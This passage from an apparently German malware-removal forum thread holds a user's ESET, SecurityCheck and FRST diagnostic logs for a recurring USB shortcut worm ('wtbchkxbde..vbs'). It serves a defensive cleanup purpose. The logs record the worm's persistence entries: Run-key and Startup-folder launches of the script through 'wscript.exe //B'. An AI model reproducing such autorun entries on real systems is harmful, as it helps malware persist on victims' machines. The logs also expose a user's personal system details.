C:\Windows\System32\winlogon.exe => MD5 is legit C:\Windows\System32\wininit.exe => MD5 is legit C:\Windows\SysWOW64\wininit.exe => MD5 is legit C:\Windows\explorer.exe => MD5 is legit C:\Windows\SysWOW64\explorer.exe => MD5 is legit C:\Windows\System32\svchost.exe => MD5 is legit C:\Windows\SysWOW64\svchost.exe => MD5 is legit C:\Windows\System32\services.exe => MD5 is legit C:\Windows\System32\User32.dll => MD5 is legit C:\Windows\SysWOW64\User32.dll => MD5 is legit C:\Windows\System32\userinit.exe => MD5 is legit C:\Windows\SysWOW64\userinit.exe => MD5 is legit C:\Windows\System32\rpcss.dll => MD5 is legit C:\Windows\System32\Drivers\volsnap.sys => MD5 is legit LastRegBack: 2014-03-24 00:49 ==================== End Of Log ============================ |
17.04.2014, 19:35 | #8 |
/// the machine /// TB-Ausbilder | Flash Drive Shortcut Virus wtbchkxbde..vbs ESET Online Scanner
Please download SecurityCheck and:
and a fresh FRST log, please. Any remaining problems?
__________________ Regards, schrauber Proud Member of UNITE and ASAP since 2009 No help via PM! |
17.04.2014, 22:48 | #9 |
| Flash Drive Shortcut Virus wtbchkxbde..vbs I did everything as described, but that hasn't actually removed anything, has it? The virus is still present, also visible in the FRST log; the .vbs reappears on the USB stick after formatting, even though the path does not show up in the ESET log. ESET log: Code:
ATTFilter ESETSmartInstaller@High as downloader log: all ok # version=8 # OnlineScannerApp.exe=1.0.0.1 # OnlineScanner.ocx=1.0.0.6920 # api_version=3.0.2 # EOSSerial=ac2dffd99c948343bad200af6691bd9b # engine=17931 # end=finished # remove_checked=false # archives_checked=true # unwanted_checked=false # unsafe_checked=false # antistealth_checked=true # utc_time=2014-04-17 08:53:19 # local_time=2014-04-17 10:53:19 (+0100, Mitteleuropäische Sommerzeit) # country="Germany" # lang=1033 # osver=6.1.7600 NT # compatibility_mode=1799 16775165 100 96 2348631 31625798 2958932 0 # compatibility_mode=5893 16776574 100 94 31600355 149397849 0 0 # scanned=203094 # found=4 # cleaned=0 # scan_time=5260 sh=410B32FD3FE4642644AD91AC60C69B86EC2762DD ft=1 fh=0e378a435beab91a vn="a variant of Win32/Adware.Yontoo.B application" ac=I fn="C:\AdwCleaner\Quarantine\C\ProgramData\Tarma Installer\{361E80BE-388B-4270-BF54-A10C2B756504}\_Setupx.dll.vir" sh=0000000000000000000000000000000000000000 ft=- fh=0000000000000000 vn="VBS/Kryptik.T trojan" ac=I fn="C:\Users\Franz\AppData\Roaming\wtbchkxbde..vbs" sh=55815CF83BD6B40E6AF7740222412B49191FA0BB ft=0 fh=0000000000000000 vn="VBS/Kryptik.T trojan" ac=I fn="C:\Users\Franz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\wtbchkxbde..vbs" sh=55815CF83BD6B40E6AF7740222412B49191FA0BB ft=0 fh=0000000000000000 vn="VBS/Kryptik.T trojan" ac=I fn="C:\Users\Franz\Desktop\Antivir\Trojanerboard\wtbchkxbde..txt" Code:
ATTFilter Results of screen317's Security Check version 0.99.81 Windows 7 x64 (UAC is disabled!) Out of date service pack!! Internet Explorer 11 ``````````````Antivirus/Firewall Check:`````````````` Avira Desktop Antivirus out of date! (On Access scanning disabled!) `````````Anti-malware/Other Utilities Check:````````` Adobe Flash Player 10 Flash Player out of Date! Adobe Reader 9 Adobe Reader out of Date! Mozilla Thunderbird (24.3.0) Google Chrome 33.0.1750.146 Google Chrome 33.0.1750.154 ````````Process Check: objlist.exe by Laurent```````` Avira Antivir avgnt.exe Avira Antivir avguard.exe `````````````````System Health check````````````````` Total Fragmentation on Drive C: ````````````````````End of Log`````````````````````` FRST: FRST Logfile: Code:
ATTFilter Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 13-04-2014 01 Ran by Franz (administrator) on FRANZ-PC on 17-04-2014 23:36:08 Running from C:\Users\Franz\Desktop Windows 7 Home Premium (X64) OS Language: German Standard Internet Explorer Version 9 Boot Mode: Normal ==================== Processes (Whitelisted) ================= (AMD) C:\Windows\system32\atiesrxx.exe (Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\AntiVir Desktop\sched.exe (Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\AntiVir Desktop\avguard.exe (Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe (AMD) C:\Windows\system32\atieclxx.exe (Atheros Commnucations) C:\Program Files (x86)\Bluetooth Suite\adminservice.exe (Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe (Dritek System Inc.) C:\Program Files (x86)\Launch Manager\dsiwmis.exe (Acer Incorporated) C:\Program Files\Acer\Acer PowerSmart Manager\ePowerSvc.exe (Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe (Locktime Software) C:\Program Files\NetLimiter 3\nlsvc.exe (NewTech Infosystems, Inc.) C:\Program Files (x86)\NewTech Infosystems\Acer Backup Manager\IScheduleSvc.exe (Acer Incorporated) C:\Program Files (x86)\Acer\Acer VCM\RS_Service.exe (Acer Group) C:\Program Files\Acer\Acer Updater\UpdaterService.exe (Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE (Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSvcM.exe (Alcor Micro Corp.) 
C:\Program Files (x86)\AmIcoSingLun\AmIcoSinglun64.exe (Intel Corporation) C:\Windows\System32\igfxtray.exe (Intel Corporation) C:\Windows\System32\hkcmd.exe (Intel Corporation) C:\Windows\System32\igfxpers.exe (Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe (Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe (Atheros Commnucations) C:\Program Files (x86)\Bluetooth Suite\BtvStack.exe (Atheros Commnucations) C:\Program Files (x86)\Bluetooth Suite\AthBtTray.exe (Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\Apoint.exe (Microsoft Corporation) C:\Windows\System32\wscript.exe (Locktime Software) C:\Program Files\NetLimiter 3\NLClientApp.exe (Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\ApMsgFwd.exe (Acer Incorporated) C:\Program Files (x86)\Acer\Acer VCM\AcerVCM.exe (Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\Apntex.exe (Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\HidFind.exe (NewTech Infosystems, Inc.) C:\Program Files (x86)\NewTech Infosystems\Acer Backup Manager\BackupManagerTray.exe (Dritek System Inc.) C:\Program Files (x86)\Launch Manager\LManager.exe (Dritek System Inc.) C:\Program Files (x86)\Launch Manager\MMDx64Fx.exe (Dritek System Inc.) C:\Program Files (x86)\Launch Manager\LMworker.exe (Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\AntiVir Desktop\avgnt.exe (Hewlett-Packard) C:\Program Files (x86)\HP\HP Software Update\hpwuschd2.exe (Apple Inc.) C:\Program Files (x86)\iTunes\iTunesHelper.exe (Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\AntiVir Desktop\avshadow.exe (Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Acer Incorporated) C:\Program Files\Acer\Acer PowerSmart Manager\ePowerTray.exe (Google Inc.) 
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Acer Incorporated) C:\Program Files\Acer\Acer PowerSmart Manager\ePowerEvent.exe (Intel Corporation) C:\Windows\system32\igfxext.exe (Intel Corporation) C:\Windows\system32\igfxsrvc.exe (Microsoft Corporation) C:\Program Files\Microsoft Games\SpiderSolitaire\SpiderSolitaire.exe (Advanced Micro Devices Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\MOM.exe (ATI Technologies Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CCC.exe (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe (Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\SyncServer.exe (Panda Security) C:\Program Files (x86)\Panda USB Vaccine\USBVaccine.exe ==================== Registry (Whitelisted) ================== HKLM\...\Run: [AmIcoSinglun64] => C:\Program Files (x86)\AmIcoSingLun\AmIcoSinglun64.exe [323584 2009-09-23] (Alcor Micro Corp.) 
HKLM\...\Run: [mwlDaemon] => C:\Program Files (x86)\EgisTec MyWinLocker\x86\mwlDaemon.exe HKLM\...\Run: [IgfxTray] => C:\Windows\system32\igfxtray.exe [166424 2010-04-21] (Intel Corporation) HKLM\...\Run: [HotKeysCmds] => C:\Windows\system32\hkcmd.exe [391192 2010-04-21] (Intel Corporation) HKLM\...\Run: [Persistence] => C:\Windows\system32\igfxpers.exe [413720 2010-04-21] (Intel Corporation) HKLM\...\Run: [RtHDVCpl] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [9996320 2010-01-20] (Realtek Semiconductor) HKLM\...\Run: [RtHDVBg] => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [877600 2010-01-20] (Realtek Semiconductor) HKLM\...\Run: [AtherosBtStack] => C:\Program Files (x86)\Bluetooth Suite\BtvStack.exe [585376 2010-05-25] (Atheros Commnucations) HKLM\...\Run: [AthBtTray] => C:\Program Files (x86)\Bluetooth Suite\AthBtTray.exe [354464 2010-05-25] (Atheros Commnucations) HKLM\...\Run: [Apoint] => C:\Program Files\Apoint2K\Apoint.exe [345648 2010-03-09] (Alps Electric Co., Ltd.) HKLM\...\Run: [Acer ePower Management] => C:\Program Files\Acer\Acer PowerSmart Manager\ePowerTrayLauncher.exe [496160 2010-02-02] (Acer Incorporated) HKLM\...\Run: [BCSSync] => C:\Program Files\Microsoft Office\Office14\BCSSync.exe [108144 2012-11-05] (Microsoft Corporation) HKLM\...\Run: [wtbchkxbde] => wscript.exe //B "C:\Users\Franz\AppData\Roaming\wtbchkxbde..vbs" <===== ATTENTION HKLM-x32\...\Run: [BackupManagerTray] => C:\Program Files (x86)\NewTech Infosystems\Acer Backup Manager\BackupManagerTray.exe [260608 2010-03-09] (NewTech Infosystems, Inc.) HKLM-x32\...\Run: [StartCCC] => C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe [98304 2010-04-21] (Advanced Micro Devices, Inc.) HKLM-x32\...\Run: [LManager] => C:\Program Files (x86)\Launch Manager\LManager.exe [960080 2010-05-26] (Dritek System Inc.) HKLM-x32\...\Run: [APSDaemon] => C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe [43848 2014-02-12] (Apple Inc.) 
HKLM-x32\...\Run: [avgnt] => C:\Program Files (x86)\Avira\AntiVir Desktop\avgnt.exe [689744 2014-02-20] (Avira Operations GmbH & Co. KG) HKLM-x32\...\Run: [HP Software Update] => C:\Program Files (x86)\Hp\HP Software Update\HPWuSchd2.exe [49208 2011-10-28] (Hewlett-Packard) HKLM-x32\...\Run: [] => [X] HKLM-x32\...\Run: [iTunesHelper] => C:\Program Files (x86)\iTunes\iTunesHelper.exe [152392 2014-02-21] (Apple Inc.) HKLM-x32\...\Run: [wtbchkxbde] => wscript.exe //B "C:\Users\Franz\AppData\Roaming\wtbchkxbde..vbs" Winlogon\Notify\igfxcui: C:\Windows\system32\igfxdev.dll (Intel Corporation) HKU\S-1-5-21-2199740673-3875191607-274323708-1001\...\Run: [NetLimiter] => C:\Program Files\NetLimiter 3\NLClientApp.exe [2910208 2011-03-21] (Locktime Software) HKU\S-1-5-21-2199740673-3875191607-274323708-1001\...\Run: [wtbchkxbde] => wscript.exe //B "C:\Users\Franz\AppData\Roaming\wtbchkxbde..vbs" <===== ATTENTION Startup: C:\Users\Franz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\wtbchkxbde..vbs () ==================== Internet (Whitelisted) ==================== HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.google.com.ph/intl/en/ HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://homepage.acer.com/rdr.aspx?b=ACAW&l=0407&m=aspire_3820&r=27360413h416l0408z115t6741k596 HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://homepage.acer.com/rdr.aspx?b=ACAW&l=0407&m=aspire_3820&r=27360413h416l0408z115t6741k596 HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://homepage.acer.com/rdr.aspx?b=ACAW&l=0407&m=aspire_3820&r=27360413h416l0408z115t6741k596 StartMenuInternet: IEXPLORE.EXE - C:\Program Files (x86)\Internet Explorer\iexplore.exe SearchScopes: HKLM-x32 - {67A2568C-7A0A-4EED-AECC-B5405DE63B64} URL = 
hxxp://www.google.com/search?sourceid=ie7&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7ACAW SearchScopes: HKCU - {67A2568C-7A0A-4EED-AECC-B5405DE63B64} URL = hxxp://www.google.com/search?sourceid=ie7&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7ACAW_deDE532 BHO: Groove GFS Browser Helper - {72853161-30C5-4D22-B7F9-0BBC1D38A37E} - C:\Program Files\Microsoft Office\Office14\GROOVEEX.DLL (Microsoft Corporation) BHO: Windows Live ID Sign-in Helper - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.) BHO: Office Document Cache Handler - {B4F3A835-0E21-4959-BA22-42B3008E02FF} - C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation) BHO-x32: Adobe PDF Link Helper - {18DF081C-E8AD-4283-A596-FA578C2EBDC3} - c:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll (Adobe Systems Incorporated) BHO-x32: Groove GFS Browser Helper - {72853161-30C5-4D22-B7F9-0BBC1D38A37E} - C:\Program Files (x86)\Microsoft Office\Office14\GROOVEEX.DLL (Microsoft Corporation) BHO-x32: Microsoft-Konto-Anmelde-Hilfsprogramm - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.) 
BHO-x32: Office Document Cache Handler - {B4F3A835-0E21-4959-BA22-42B3008E02FF} - C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation) Handler-x32: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll (Skype Technologies) FireFox: ======== FF Plugin: @microsoft.com/GENUINE - disabled No File FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 - C:\PROGRA~1\MICROS~2\Office14\NPAUTHZ.DLL (Microsoft Corporation) FF Plugin: @videolan.org/vlc,version=2.0.6 - C:\Program Files\VideoLAN\VLC\npvlc.dll (VideoLAN) FF Plugin-x32: @Apple.com/iTunes,version=1.0 - C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll () FF Plugin-x32: @microsoft.com/GENUINE - disabled No File FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 - C:\PROGRA~2\MICROS~4\Office14\NPAUTHZ.DLL (Microsoft Corporation) FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 - C:\PROGRA~2\MICROS~4\Office14\NPSPWRAP.DLL (Microsoft Corporation) FF Plugin-x32: @microsoft.com/WLPG,version=16.4.3508.0205 - C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation) FF Plugin-x32: @tools.google.com/Google Update;version=3 - C:\Program Files (x86)\Google\Update\1.3.23.9\npGoogleUpdate3.dll (Google Inc.) FF Plugin-x32: @tools.google.com/Google Update;version=9 - C:\Program Files (x86)\Google\Update\1.3.23.9\npGoogleUpdate3.dll (Google Inc.) 
Chrome: ======= CHR Plugin: (Shockwave Flash) - C:\Users\Franz\AppData\Local\Google\Chrome\User Data\PepperFlash\11.7.700.202\pepflashplayer.dll No File CHR Plugin: (Chrome Remote Desktop Viewer) - internal-remoting-viewer CHR Plugin: (Native Client) - C:\Program Files (x86)\Google\Chrome\Application\33.0.1750.154\ppGoogleNaClPluginChrome.dll () CHR Plugin: (Chrome PDF Viewer) - C:\Program Files (x86)\Google\Chrome\Application\33.0.1750.154\pdf.dll () CHR Plugin: (Adobe Acrobat) - c:\Program Files (x86)\Adobe\Reader 9.0\Reader\Browser\nppdf32.dll (Adobe Systems Inc.) CHR Plugin: (Microsoft Office 2010) - C:\PROGRA~2\MICROS~4\Office14\NPAUTHZ.DLL (Microsoft Corporation) CHR Plugin: (Microsoft Office 2010) - C:\PROGRA~2\MICROS~4\Office14\NPSPWRAP.DLL (Microsoft Corporation) CHR Plugin: (Google Update) - C:\Program Files (x86)\Google\Update\1.3.21.135\npGoogleUpdate3.dll No File CHR Plugin: (iTunes Application Detector) - C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll () CHR Extension: (Google Docs) - C:\Users\Franz\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2013-05-15] CHR Extension: (Google Drive) - C:\Users\Franz\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2013-05-15] CHR Extension: (YouTube) - C:\Users\Franz\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2013-05-15] CHR Extension: (Google-Suche) - C:\Users\Franz\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2013-05-15] CHR Extension: (Google Wallet) - C:\Users\Franz\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2013-09-10] ==================== Services (Whitelisted) ================= R2 AntiVirSchedulerService; C:\Program Files (x86)\Avira\AntiVir Desktop\sched.exe [440400 2014-02-20] (Avira Operations GmbH & Co. 
KG) R2 AntiVirService; C:\Program Files (x86)\Avira\AntiVir Desktop\avguard.exe [440400 2014-02-20] (Avira Operations GmbH & Co. KG) R2 ePowerSvc; C:\Program Files\Acer\Acer PowerSmart Manager\ePowerSvc.exe [820768 2010-02-02] (Acer Incorporated) R2 nlsvc; C:\Program Files\NetLimiter 3\nlsvc.exe [1845248 2011-03-21] (Locktime Software) R2 RS_Service; C:\Program Files (x86)\Acer\Acer VCM\RS_Service.exe [260640 2010-01-29] (Acer Incorporated) ==================== Drivers (Whitelisted) ==================== U5 AppMgmt; C:\Windows\system32\svchost.exe [27136 2009-07-14] (Microsoft Corporation) R2 avgntflt; C:\Windows\System32\DRIVERS\avgntflt.sys [108440 2013-12-22] (Avira Operations GmbH & Co. KG) R1 avipbb; C:\Windows\System32\DRIVERS\avipbb.sys [131576 2013-12-22] (Avira Operations GmbH & Co. KG) R1 avkmgr; C:\Windows\System32\DRIVERS\avkmgr.sys [28600 2013-12-15] (Avira Operations GmbH & Co. KG) R1 nltdi; C:\Program Files\NetLimiter 3\nltdi.sys [88200 2011-03-21] (Locktime Software) S3 catchme; \??\C:\ComboFix\catchme.sys [X] ==================== NetSvcs (Whitelisted) =================== ==================== One Month Created Files and Folders ======== 2014-04-17 23:36 - 2014-04-17 23:36 - 00015867 _____ () C:\Users\Franz\Desktop\FRST.txt 2014-04-17 23:35 - 2014-04-17 23:35 - 00001084 _____ () C:\Users\Franz\Desktop\checkup.txt 2014-04-17 21:07 - 2014-04-17 21:07 - 00987448 _____ () C:\Users\Franz\Desktop\SecurityCheck.exe 2014-04-16 23:57 - 2014-04-16 23:59 - 00000041 _____ () C:\Users\Franz\Desktop\pw.txt 2014-04-16 23:46 - 2014-04-16 23:46 - 00000000 ____D () C:\Windows\ERUNT 2014-04-16 23:07 - 2014-04-16 23:10 - 00119512 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys 2014-04-16 23:06 - 2014-04-16 23:06 - 00001106 _____ () C:\Users\Public\Desktop\ Malwarebytes Anti-Malware .lnk 2014-04-16 23:06 - 2014-04-16 23:06 - 00000000 ____D () C:\ProgramData\Malwarebytes 2014-04-16 23:06 - 2014-04-16 23:06 - 00000000 ____D () C:\Program Files 
(x86)\ Malwarebytes Anti-Malware 2014-04-16 23:06 - 2014-04-03 09:51 - 00088280 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys 2014-04-16 23:06 - 2014-04-03 09:51 - 00063192 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys 2014-04-16 23:06 - 2014-04-03 09:50 - 00025816 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbam.sys 2014-04-16 02:56 - 2014-04-16 03:44 - 00000000 ____D () C:\Qoobox 2014-04-16 02:56 - 2014-04-16 03:35 - 00000000 ____D () C:\Windows\erdnt 2014-04-16 02:56 - 2011-06-26 08:45 - 00256000 _____ () C:\Windows\PEV.exe 2014-04-16 02:56 - 2010-11-07 19:20 - 00208896 _____ () C:\Windows\MBR.exe 2014-04-16 02:56 - 2009-04-20 06:56 - 00060416 _____ (NirSoft) C:\Windows\NIRCMD.exe 2014-04-16 02:56 - 2000-08-31 02:00 - 00518144 _____ (SteelWerX) C:\Windows\SWREG.exe 2014-04-16 02:56 - 2000-08-31 02:00 - 00406528 _____ (SteelWerX) C:\Windows\SWSC.exe 2014-04-16 02:56 - 2000-08-31 02:00 - 00098816 _____ () C:\Windows\sed.exe 2014-04-16 02:56 - 2000-08-31 02:00 - 00080412 _____ () C:\Windows\grep.exe 2014-04-16 02:56 - 2000-08-31 02:00 - 00068096 _____ () C:\Windows\zip.exe 2014-04-16 02:52 - 2014-04-16 02:52 - 00000000 ____D () C:\ProgramData\Panda Security 2014-04-16 02:52 - 2014-04-16 02:52 - 00000000 ____D () C:\Program Files (x86)\Panda USB Vaccine 2014-04-16 02:50 - 2014-04-16 02:50 - 00003072 _____ () C:\Windows\System32\Tasks\PandaUSBVaccine 2014-04-16 02:47 - 2014-04-16 02:48 - 05194807 ____R (Swearware) C:\Users\Franz\Desktop\ComboFix.exe 2014-04-14 11:21 - 2008-03-22 04:21 - 733980672 ___SH () C:\Users\Franz\Desktop\The Seeker-The Dark is Rising[2007]DvDrip[Eng]-FXG.avi 2014-04-14 11:19 - 2012-11-07 09:32 - 247528059 ___SH () C:\Users\Franz\Desktop\Amityville Horror 2 The Possession (Full Movie) - YouTube.flv 2014-04-14 11:19 - 2010-01-05 16:04 - 956607690 ___SH () C:\Users\Franz\Desktop\The Marine 2 (2010) DVDR DivXNL-Team.avi 2014-04-14 10:43 - 2014-04-17 23:36 - 00000000 ____D () 
C:\FRST 2014-04-14 10:40 - 2014-04-14 10:42 - 02157568 _____ (Farbar) C:\Users\Franz\Desktop\FRST64.exe 2014-04-11 05:39 - 2014-03-04 14:07 - 142602520 _____ (Microsoft Corporation) C:\Users\Franz\Desktop\wlsetup-all_16.4.3508.0205.exe 2014-04-07 09:32 - 2014-04-09 10:19 - 00000000 ____D () C:\[Smad-Cage] 2014-04-07 09:30 - 2014-04-07 09:30 - 00000000 ____D () C:\ProgramData\Kaspersky Lab Setup Files 2014-04-03 10:10 - 2014-04-12 01:15 - 00000000 ____D () C:\Users\Franz\Desktop\FPCD 2014-04-02 08:42 - 2014-04-16 22:12 - 00000000 ____D () C:\Users\Franz\Desktop\Antivir 2014-04-02 08:27 - 2014-04-02 08:27 - 00000000 ____D () C:\Windows\pss 2014-04-02 08:19 - 2014-04-02 08:54 - 00000000 ____D () C:\Users\Franz\AppData\Local\NPE 2014-04-02 08:19 - 2014-04-02 08:19 - 00000000 ____D () C:\ProgramData\Norton 2014-04-02 06:29 - 2013-02-01 10:07 - 557660892 _____ () C:\Users\Franz\Desktop\Bavaria Traumreise durch Bayern.mkv 2014-04-02 06:15 - 2013-03-03 06:17 - 3702646581 _____ () C:\Users\Franz\Desktop\Das grüne Wunder - Unser Wald.mkv 2014-04-01 04:51 - 2013-09-22 17:47 - 00073266 _____ () C:\Users\Franz\AppData\Roaming\wtbchkxbde..vbs 2014-03-25 09:41 - 2014-03-25 09:41 - 00003416 ____N () C:\bootsqm.dat 2014-03-25 09:40 - 2014-03-25 09:40 - 00000000 ____D () C:\found.001 2014-03-21 07:44 - 2014-03-24 01:36 - 00000000 ____D () C:\Users\Franz\AppData\Local\Microsoft Games 2014-03-19 13:05 - 2014-03-19 13:05 - 00000000 ____D () C:\Users\Franz\Desktop\Neu ==================== One Month Modified Files and Folders ======= 2014-04-17 23:36 - 2014-04-17 23:36 - 00015867 _____ () C:\Users\Franz\Desktop\FRST.txt 2014-04-17 23:36 - 2014-04-14 10:43 - 00000000 ____D () C:\FRST 2014-04-17 23:35 - 2014-04-17 23:35 - 00001084 _____ () C:\Users\Franz\Desktop\checkup.txt 2014-04-17 23:28 - 2013-04-16 20:09 - 00001108 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job 2014-04-17 23:14 - 2013-04-16 20:29 - 00000043 _____ () C:\Users\Public\Documents\AtherosServiceConfig.ini 
2014-04-17 23:14 - 2013-04-16 19:13 - 01673821 _____ () C:\Windows\WindowsUpdate.log 2014-04-17 21:07 - 2014-04-17 21:07 - 00987448 _____ () C:\Users\Franz\Desktop\SecurityCheck.exe 2014-04-17 08:28 - 2013-04-16 20:09 - 00001104 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job 2014-04-17 05:53 - 2009-07-14 06:45 - 00022672 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0 2014-04-17 05:53 - 2009-07-14 06:45 - 00022672 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0 2014-04-17 05:33 - 2009-07-14 07:08 - 00000006 ____H () C:\Windows\Tasks\SA.DAT 2014-04-17 05:32 - 2009-07-14 06:51 - 00088400 _____ () C:\Windows\setupact.log 2014-04-17 02:07 - 2013-04-17 05:01 - 00696870 _____ () C:\Windows\system32\perfh007.dat 2014-04-17 02:07 - 2013-04-17 05:01 - 00148134 _____ () C:\Windows\system32\perfc007.dat 2014-04-17 02:07 - 2009-07-14 07:13 - 01612484 _____ () C:\Windows\system32\PerfStringBackup.INI 2014-04-17 00:00 - 2014-03-11 17:56 - 00000000 ____D () C:\AdwCleaner 2014-04-17 00:00 - 2010-05-11 01:15 - 00113344 _____ () C:\Windows\PFRO.log 2014-04-16 23:59 - 2014-04-16 23:57 - 00000041 _____ () C:\Users\Franz\Desktop\pw.txt 2014-04-16 23:46 - 2014-04-16 23:46 - 00000000 ____D () C:\Windows\ERUNT 2014-04-16 23:10 - 2014-04-16 23:07 - 00119512 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys 2014-04-16 23:06 - 2014-04-16 23:06 - 00001106 _____ () C:\Users\Public\Desktop\ Malwarebytes Anti-Malware .lnk 2014-04-16 23:06 - 2014-04-16 23:06 - 00000000 ____D () C:\ProgramData\Malwarebytes 2014-04-16 23:06 - 2014-04-16 23:06 - 00000000 ____D () C:\Program Files (x86)\ Malwarebytes Anti-Malware 2014-04-16 22:12 - 2014-04-02 08:42 - 00000000 ____D () C:\Users\Franz\Desktop\Antivir 2014-04-16 03:44 - 2014-04-16 02:56 - 00000000 ____D () C:\Qoobox 2014-04-16 03:43 - 2009-07-14 05:20 - 00000000 __RHD () C:\Users\Default 
